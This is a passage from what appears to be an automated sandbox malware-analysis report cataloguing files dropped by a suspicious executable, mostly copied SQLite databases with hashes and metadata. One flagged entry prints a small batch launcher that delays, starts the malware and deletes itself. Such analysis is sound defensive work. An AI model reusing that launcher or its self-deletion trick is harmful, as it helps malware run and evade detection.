SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\XeIbEvYWIQ

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\XfsjXjzani

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\XqiNtduMAb

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YB2QKAN3eQ

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Yxgr1urcPa

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Za0p8caj7c

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Ze4zcGVeMm.bat

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	180
Entropy (8bit):	5.2974817565206545
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m7xkrVJvDENHovBktKcKZG1Ukh4E2J5xAIK5ehq:hCRLuVFOOr+DEdEj7ENHovKOZG1923f6
MD5:	F0173C89340BB04EDE0941BE47F54052
SHA1:	64CB1EED6A19054E20266B1E86CD336E1B55532B
SHA-256:	61107B98A7CD312BB04BAED904592AD201D2BB0E5F92B22473A5E0C751F9A8CA
SHA-512:	D5BC91936F89E9E27E1F7A97B85763F71E8A602A7A892103F168C762A7E52909B543DD2E5CDA0F319906257284AE5EB5A19B4DE0CB56C6C7964EC5EB4076B0BF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Ze4zcGVeMm.bat"

C:\Users\user\AppData\Local\Temp\ZyG94YRzJN

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aCMdlozFYm

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\b2r8xOlCj9

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bB1ULWqG6U

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bJ8LwpR4qZ

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bWtkA76etY

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\baC1cTR3Sp

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bkh9Jp9Jwl

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\c5GIUnFg6B

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cKcMilBBpj

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cPqdm3tXvj

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cg0nV0ykwh

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cppajFaZuc

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\crPCTBXw6F

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\d9OuvxQfZ2

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dJdYqv9Zl2

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dtw7ZxyIri

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\dvir2jNSnN

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\e1QttHmKdh

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
